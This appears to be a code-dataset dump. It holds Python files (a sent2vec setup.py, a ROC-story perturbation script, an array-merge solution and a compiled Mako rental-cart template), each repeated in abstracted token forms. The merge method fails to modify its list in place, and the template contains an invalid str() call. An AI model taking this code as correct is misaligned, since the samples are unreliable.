[ "from setuptools import setup, find_packages\nfrom setuptools.extension import Extension\nfrom sys import platform\n\ncython = True\n\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\n\n# Define the C++ extension\nif platform == \"darwin\":\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x', '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\n\nextensions = []\n\nif cython:\n extensions = [\n Extension('sent2vec',\n sources=[\n 'sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc',\n 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc',\n 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc',\n 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc',\n 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'\n ],\n language='c++',\n extra_compile_args=extra_compile_args\n )\n ]\n\n extensions = cythonize(extensions)\nelse:\n extensions = [\n Extension('sent2vec',\n sources=[\n 'sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc',\n 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc',\n 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc',\n 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc',\n 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'\n ],\n language='c++',\n extra_compile_args=extra_compile_args\n )\n ]\n\n# Package details\nsetup(\n name='sent2vec',\n version='0.1.0',\n author='',\n author_email='',\n url='',\n description='A Python interface for sent2vec library',\n license='BSD 3-Clause License',\n packages=['sent2vec'],\n ext_modules = extensions,\n install_requires=[],\n classifiers= []\n)\n", "from setuptools import setup, find_packages\nfrom setuptools.extension import Extension\nfrom sys import platform\ncython = True\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\nif platform == 'darwin':\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',\n '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\nextensions = []\nif cython:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\n extensions = cythonize(extensions)\nelse:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\nsetup(name='sent2vec', version='0.1.0', author='', author_email='', url='',\n description='A Python interface for sent2vec library', license=\n 'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,\n install_requires=[], classifiers=[])\n", "<import token>\ncython = True\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\nif platform == 'darwin':\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',\n '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\nextensions = []\nif cython:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\n extensions = cythonize(extensions)\nelse:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\nsetup(name='sent2vec', version='0.1.0', author='', author_email='', url='',\n description='A Python interface for sent2vec library', license=\n 'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,\n install_requires=[], classifiers=[])\n", "<import token>\n<assignment token>\ntry:\n from Cython.Build import cythonize\n cython = True\nexcept ImportError:\n cython = False\nif platform == 'darwin':\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x',\n '-stdlib=libc++', '-mmacosx-version-min=10.7']\nelse:\n extra_compile_args = ['-O3', '-pthread', '-funroll-loops', '-std=c++0x']\n<assignment token>\nif cython:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.pyx',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\n extensions = cythonize(extensions)\nelse:\n extensions = [Extension('sent2vec', sources=['sent2vec/sent2vec.cpp',\n 'sent2vec/cpp/src/args.cc', 'sent2vec/cpp/src/dictionary.cc',\n 'sent2vec/cpp/src/fasttext.cc', 'sent2vec/cpp/src/main.cc',\n 'sent2vec/cpp/src/matrix.cc', 'sent2vec/cpp/src/model.cc',\n 'sent2vec/cpp/src/productquantizer.cc',\n 'sent2vec/cpp/src/qmatrix.cc', 'sent2vec/cpp/src/utils.cc',\n 'sent2vec/cpp/src/vector.cc'], language='c++', extra_compile_args=\n extra_compile_args)]\nsetup(name='sent2vec', version='0.1.0', author='', author_email='', url='',\n description='A Python interface for sent2vec library', license=\n 'BSD 3-Clause License', packages=['sent2vec'], ext_modules=extensions,\n install_requires=[], classifiers=[])\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
27
2aec0581413d4fb0ffb4090231fde0fed974bf18
import numpy as np import random with open("./roc.txt", "r") as fin: with open("./roc_shuffle.txt", "w") as fout: tmp = [] for k, line in enumerate(fin): i = k + 1 if i % 6 == 0: idx = [0] + np.random.permutation(range(1,5)).tolist() for sen in np.take(tmp, idx).tolist(): fout.write(sen+"\n") tmp = [] fout.write(line.strip()+"\n") else: tmp.append(line.strip()) with open("./roc.txt", "r") as fin: with open("./roc_repeat.txt", "w") as fout: tmp = [] for k, line in enumerate(fin): i = k + 1 if i % 6 == 0: idx = random.randint(1,4) tmp[idx] = tmp[idx][:-1] + tmp[idx] for sen in tmp: fout.write(sen+"\n") tmp = [] fout.write(line.strip()+"\n") else: tmp.append(line.strip()) with open("./roc.txt", "r") as fin: with open("./roc_replace.txt", "w") as fout: post, tmp = [], [] for k, line in enumerate(fin): i = k + 1 if i % 6 == 0: post.append(tmp) tmp = [] else: tmp.append(line.strip().split()) data = {"1":[], "2":[], "3":[], "4":[], "5":[]} for p in post: for i in range(5): data["%d"%(i+1)].append(p[i]) random_data = data.copy() for i in range(5): random_data["%d"%(i+1)] = np.random.permutation(random_data["%d"%(i+1)]) for k in range(len(post)): idx = np.random.permutation(range(1,5))[0] for i in range(5): if i == idx: fout.write(' '.join(random_data["%d"%(i+1)][k])+"\n") else: fout.write(' '.join(data["%d"%(i+1)][k])+"\n") fout.write("------\n")
[ "import numpy as np\nimport random\n\nwith open(\"./roc.txt\", \"r\") as fin:\n with open(\"./roc_shuffle.txt\", \"w\") as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = [0] + np.random.permutation(range(1,5)).tolist()\n for sen in np.take(tmp, idx).tolist():\n fout.write(sen+\"\\n\")\n tmp = []\n fout.write(line.strip()+\"\\n\")\n else:\n tmp.append(line.strip())\nwith open(\"./roc.txt\", \"r\") as fin:\n with open(\"./roc_repeat.txt\", \"w\") as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = random.randint(1,4)\n tmp[idx] = tmp[idx][:-1] + tmp[idx]\n for sen in tmp:\n fout.write(sen+\"\\n\")\n tmp = []\n fout.write(line.strip()+\"\\n\")\n else:\n tmp.append(line.strip())\nwith open(\"./roc.txt\", \"r\") as fin:\n with open(\"./roc_replace.txt\", \"w\") as fout:\n post, tmp = [], []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n post.append(tmp)\n tmp = []\n else:\n tmp.append(line.strip().split())\n data = {\"1\":[], \"2\":[], \"3\":[], \"4\":[], \"5\":[]}\n for p in post:\n for i in range(5):\n data[\"%d\"%(i+1)].append(p[i])\n random_data = data.copy()\n for i in range(5):\n random_data[\"%d\"%(i+1)] = np.random.permutation(random_data[\"%d\"%(i+1)])\n\n for k in range(len(post)):\n idx = np.random.permutation(range(1,5))[0]\n for i in range(5):\n if i == idx:\n fout.write(' '.join(random_data[\"%d\"%(i+1)][k])+\"\\n\")\n else:\n fout.write(' '.join(data[\"%d\"%(i+1)][k])+\"\\n\")\n fout.write(\"------\\n\")", "import numpy as np\nimport random\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_shuffle.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = [0] + np.random.permutation(range(1, 5)).tolist()\n for sen in np.take(tmp, idx).tolist():\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_repeat.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = random.randint(1, 4)\n tmp[idx] = tmp[idx][:-1] + tmp[idx]\n for sen in tmp:\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_replace.txt', 'w') as fout:\n post, tmp = [], []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n post.append(tmp)\n tmp = []\n else:\n tmp.append(line.strip().split())\n data = {'1': [], '2': [], '3': [], '4': [], '5': []}\n for p in post:\n for i in range(5):\n data['%d' % (i + 1)].append(p[i])\n random_data = data.copy()\n for i in range(5):\n random_data['%d' % (i + 1)] = np.random.permutation(random_data\n ['%d' % (i + 1)])\n for k in range(len(post)):\n idx = np.random.permutation(range(1, 5))[0]\n for i in range(5):\n if i == idx:\n fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\\n')\n else:\n fout.write(' '.join(data['%d' % (i + 1)][k]) + '\\n')\n fout.write('------\\n')\n", "<import token>\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_shuffle.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = [0] + np.random.permutation(range(1, 5)).tolist()\n for sen in np.take(tmp, idx).tolist():\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_repeat.txt', 'w') as fout:\n tmp = []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n idx = random.randint(1, 4)\n tmp[idx] = tmp[idx][:-1] + tmp[idx]\n for sen in tmp:\n fout.write(sen + '\\n')\n tmp = []\n fout.write(line.strip() + '\\n')\n else:\n tmp.append(line.strip())\nwith open('./roc.txt', 'r') as fin:\n with open('./roc_replace.txt', 'w') as fout:\n post, tmp = [], []\n for k, line in enumerate(fin):\n i = k + 1\n if i % 6 == 0:\n post.append(tmp)\n tmp = []\n else:\n tmp.append(line.strip().split())\n data = {'1': [], '2': [], '3': [], '4': [], '5': []}\n for p in post:\n for i in range(5):\n data['%d' % (i + 1)].append(p[i])\n random_data = data.copy()\n for i in range(5):\n random_data['%d' % (i + 1)] = np.random.permutation(random_data\n ['%d' % (i + 1)])\n for k in range(len(post)):\n idx = np.random.permutation(range(1, 5))[0]\n for i in range(5):\n if i == idx:\n fout.write(' '.join(random_data['%d' % (i + 1)][k]) + '\\n')\n else:\n fout.write(' '.join(data['%d' % (i + 1)][k]) + '\\n')\n fout.write('------\\n')\n", "<import token>\n<code token>\n" ]
false
28
4f13e2858d9cf469f14026808142886e5c3fcc85
class Solution: def merge(self, nums1, m, nums2, n): """ Do not return anything, modify nums1 in-place instead. """ if n == 0: nums1 = nums1 if nums1[m-1] <= nums2[0]: for i in range(n): nums1[m+i] = nums2[i] elif nums1[0] >= nums2[-1]: for i in range(m): nums1[i] = nums1[n+i] else: ans = [None]*len(nums1) i = 0 j = 0 k = 0 while i < m and j < n: if nums1[i] <= nums2[j]: print("take 1: ", nums1[i]) ans[k] = nums1[i] i += 1 else: print("take 2: ", nums2[j]) ans[k] = nums2[j] j += 1 k += 1 nums1 = ans if __name__ == "__main__": solve = Solution() nums1 = [1,2,3,0,0,0] m = 3 nums2 = [2,5,6] n = 3 solve.merge(nums1, m, nums2, n) print(nums1)
[ "class Solution:\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n \n if n == 0:\n nums1 = nums1\n if nums1[m-1] <= nums2[0]:\n \n for i in range(n):\n nums1[m+i] = nums2[i]\n \n elif nums1[0] >= nums2[-1]:\n \n for i in range(m):\n nums1[i] = nums1[n+i]\n else:\n ans = [None]*len(nums1)\n i = 0\n j = 0\n k = 0\n \n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n print(\"take 1: \", nums1[i])\n ans[k] = nums1[i]\n i += 1\n else:\n print(\"take 2: \", nums2[j])\n ans[k] = nums2[j]\n j += 1\n k += 1\n\n nums1 = ans\n\nif __name__ == \"__main__\":\n solve = Solution()\n nums1 = [1,2,3,0,0,0]\n m = 3\n nums2 = [2,5,6]\n n = 3\n solve.merge(nums1, m, nums2, n)\n print(nums1)\n\n", "class Solution:\n\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n if n == 0:\n nums1 = nums1\n if nums1[m - 1] <= nums2[0]:\n for i in range(n):\n nums1[m + i] = nums2[i]\n elif nums1[0] >= nums2[-1]:\n for i in range(m):\n nums1[i] = nums1[n + i]\n else:\n ans = [None] * len(nums1)\n i = 0\n j = 0\n k = 0\n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n print('take 1: ', nums1[i])\n ans[k] = nums1[i]\n i += 1\n else:\n print('take 2: ', nums2[j])\n ans[k] = nums2[j]\n j += 1\n k += 1\n nums1 = ans\n\n\nif __name__ == '__main__':\n solve = Solution()\n nums1 = [1, 2, 3, 0, 0, 0]\n m = 3\n nums2 = [2, 5, 6]\n n = 3\n solve.merge(nums1, m, nums2, n)\n print(nums1)\n", "class Solution:\n\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n if n == 0:\n nums1 = nums1\n if nums1[m - 1] <= nums2[0]:\n for i in range(n):\n nums1[m + i] = nums2[i]\n elif nums1[0] >= nums2[-1]:\n for i in range(m):\n nums1[i] = nums1[n + i]\n else:\n ans = [None] * len(nums1)\n i = 0\n j = 0\n k = 0\n while i < m and j < n:\n if nums1[i] <= nums2[j]:\n print('take 1: ', nums1[i])\n ans[k] = nums1[i]\n i += 1\n else:\n print('take 2: ', nums2[j])\n ans[k] = nums2[j]\n j += 1\n k += 1\n nums1 = ans\n\n\n<code token>\n", "class Solution:\n <function token>\n\n\n<code token>\n", "<class token>\n<code token>\n" ]
false
29
57967f36a45bb3ea62708bbbb5b2f4ddb0f4bb16
# -*- coding:ascii -*- from mako import runtime, filters, cache UNDEFINED = runtime.UNDEFINED __M_dict_builtin = dict __M_locals_builtin = locals _magic_number = 10 _modified_time = 1428612037.145222 _enable_loop = True _template_filename = 'C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html' _template_uri = '/account.rentalcart.html' _source_encoding = 'ascii' import os, os.path, re _exports = ['content'] from datetime import datetime, timedelta now = datetime.now() noww = now.strftime('%B %d, %Y') def _mako_get_namespace(context, name): try: return context.namespaces[(__name__, name)] except KeyError: _mako_generate_namespaces(context) return context.namespaces[(__name__, name)] def _mako_generate_namespaces(context): pass def _mako_inherit(template, context): _mako_generate_namespaces(context) return runtime._inherit_from(context, 'base_ajax.htm', _template_uri) def render_body(context,**pageargs): __M_caller = context.caller_stack._push_frame() try: __M_locals = __M_dict_builtin(pageargs=pageargs) int = context.get('int', UNDEFINED) str = context.get('str', UNDEFINED) rentals = context.get('rentals', UNDEFINED) def content(): return render_content(context._locals(__M_locals)) request = context.get('request', UNDEFINED) STATIC_URL = context.get('STATIC_URL', UNDEFINED) __M_writer = context.writer() __M_writer('\r\n') __M_writer('\r\n') __M_writer(str(nowww = noww - timedelta(days=3))) __M_writer('\r\n') if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'): context['self'].content(**pageargs) __M_writer('\r\n\r\n') return '' finally: context.caller_stack._pop_frame() def render_content(context,**pageargs): __M_caller = context.caller_stack._push_frame() try: int = context.get('int', UNDEFINED) str = context.get('str', UNDEFINED) rentals = context.get('rentals', UNDEFINED) def content(): return render_content(context) request = context.get('request', UNDEFINED) STATIC_URL = context.get('STATIC_URL', UNDEFINED) __M_writer = context.writer() __M_writer('\r\n\r\n<table class="table-responsive table-striped">\r\n <th></th>\r\n <th>#</th>\r\n <th>Name</th>\r\n <th>Price per Day</th>\r\n <th># of Days Rented</th>\r\n') for item in rentals: __M_writer(' <tr>\r\n <td><button rel="') __M_writer(str( item.id )) __M_writer('" class="btn btn-danger btn-sm deleter">Remove</button></td>\r\n <td class="img-col"><img class="shopping_cart_image" src="') __M_writer(str(STATIC_URL)) __M_writer(str( item.photo.image )) __M_writer('"/></td>\r\n <td class="name-col">') __M_writer(str( noww )) __M_writer('</td>\r\n <td class="price-col">') __M_writer(str( item.price_per_day )) __M_writer('</td>\r\n <td class="qty-col">') __M_writer(str(int(request.session['rental_cart'][str(item.id)]))) __M_writer('</td>\r\n </tr>\r\n') __M_writer('</table>\r\n<table id="button-table" class="table-responsive">\r\n <tr>\r\n <td id="space"></td>\r\n') if request.user.is_authenticated(): __M_writer(' <td id=\'checkout\'><a href="/account.checkout" class="btn btn-warning">Checkout</a></td>\r\n') else: __M_writer(' <td id=\'checkout\'><a href="/mylogin.cartlogin" class="btn btn-warning">Checkout</a></td>\r\n') __M_writer(' </tr>\r\n</table>\r\n') return '' finally: context.caller_stack._pop_frame() """ __M_BEGIN_METADATA {"uri": "/account.rentalcart.html", "line_map": {"70": 8, "71": 16, "72": 17, "73": 18, "74": 18, "75": 19, "76": 19, "77": 19, "78": 20, "79": 20, "80": 21, "81": 21, "82": 22, "83": 22, "84": 25, "85": 29, "86": 30, "87": 31, "88": 32, "89": 34, "95": 89, "33": 0, "16": 2, "45": 1, "46": 6, "47": 7, "48": 7, "53": 36, "59": 8}, "filename": "C:\\Users\\Cody\\Desktop\\Heritage\\chf\\templates/account.rentalcart.html", "source_encoding": "ascii"} __M_END_METADATA """
[ "# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428612037.145222\n_enable_loop = True\n_template_filename = 'C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html'\n_template_uri = '/account.rentalcart.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['content']\n\n\n\nfrom datetime import datetime, timedelta\nnow = datetime.now()\nnoww = now.strftime('%B %d, %Y')\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww = noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n')\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str( item.id ))\n __M_writer('\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"')\n __M_writer(str(STATIC_URL))\n __M_writer(str( item.photo.image ))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str( noww ))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str( item.price_per_day ))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer('</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n')\n if request.user.is_authenticated():\n __M_writer(' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n')\n else:\n __M_writer(' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n')\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"uri\": \"/account.rentalcart.html\", \"line_map\": {\"70\": 8, \"71\": 16, \"72\": 17, \"73\": 18, \"74\": 18, \"75\": 19, \"76\": 19, \"77\": 19, \"78\": 20, \"79\": 20, \"80\": 21, \"81\": 21, \"82\": 22, \"83\": 22, \"84\": 25, \"85\": 29, \"86\": 30, \"87\": 31, \"88\": 32, \"89\": 34, \"95\": 89, \"33\": 0, \"16\": 2, \"45\": 1, \"46\": 6, \"47\": 7, \"48\": 7, \"53\": 36, \"59\": 8}, \"filename\": \"C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html\", \"source_encoding\": \"ascii\"}\n__M_END_METADATA\n\"\"\"\n", "from mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428612037.145222\n_enable_loop = True\n_template_filename = (\n 'C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html'\n )\n_template_uri = '/account.rentalcart.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['content']\nfrom datetime import datetime, timedelta\nnow = datetime.now()\nnoww = now.strftime('%B %d, %Y')\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[__name__, name]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[__name__, name]\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer('\\r\\n')\n __M_writer('\\r\\n')\n __M_writer(str(nowww=noww - timedelta(days=3)))\n __M_writer('\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data[\n 'parent'], 'content'):\n context['self'].content(**pageargs)\n __M_writer('\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context)\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(\n '\\r\\n\\r\\n<table class=\"table-responsive table-striped\">\\r\\n <th></th>\\r\\n <th>#</th>\\r\\n <th>Name</th>\\r\\n <th>Price per Day</th>\\r\\n <th># of Days Rented</th>\\r\\n'\n )\n for item in rentals:\n __M_writer(' <tr>\\r\\n <td><button rel=\"')\n __M_writer(str(item.id))\n __M_writer(\n '\" class=\"btn btn-danger btn-sm deleter\">Remove</button></td>\\r\\n <td class=\"img-col\"><img class=\"shopping_cart_image\" src=\"'\n )\n __M_writer(str(STATIC_URL))\n __M_writer(str(item.photo.image))\n __M_writer('\"/></td>\\r\\n <td class=\"name-col\">')\n __M_writer(str(noww))\n __M_writer('</td>\\r\\n <td class=\"price-col\">')\n __M_writer(str(item.price_per_day))\n __M_writer('</td>\\r\\n <td class=\"qty-col\">')\n __M_writer(str(int(request.session['rental_cart'][str(item.id)])))\n __M_writer('</td>\\r\\n </tr>\\r\\n')\n __M_writer(\n '</table>\\r\\n<table id=\"button-table\" class=\"table-responsive\">\\r\\n <tr>\\r\\n <td id=\"space\"></td>\\r\\n'\n )\n if request.user.is_authenticated():\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/account.checkout\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n else:\n __M_writer(\n ' <td id=\\'checkout\\'><a href=\"/mylogin.cartlogin\" class=\"btn btn-warning\">Checkout</a></td>\\r\\n'\n )\n __M_writer(' </tr>\\r\\n</table>\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n<docstring token>\n", "<import token>\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428612037.145222\n_enable_loop = True\n_template_filename = (\n 'C:\\\\Users\\\\Cody\\\\Desktop\\\\Heritage\\\\chf\\\\templates/account.rentalcart.html'\n )\n_template_uri = '/account.rentalcart.html'\n_source_encoding = 'ascii'\n<import token>\n_exports = ['content']\n<import token>\nnow = datetime.now()\nnoww = now.strftime('%B %d, %Y')\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[__name__, name]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[__name__, name]\n\n\ndef _mako_generate_namespaces(context):\n pass\n\n\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base_ajax.htm', _template_uri)\n\n\ndef render_body(context, **pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n int = context.get('int', UNDEFINED)\n str = context.get('str', UNDEFINED)\n rentals = context.get('rentals', UNDEFINED)\n\n def content():\n return render_content(context._locals(__M_locals))\n request = context.get('request', UNDEFINED)\n STATIC_URL = context.get('STATIC_URL', UNDEFINED)\n __M_writer = context.writer()\n 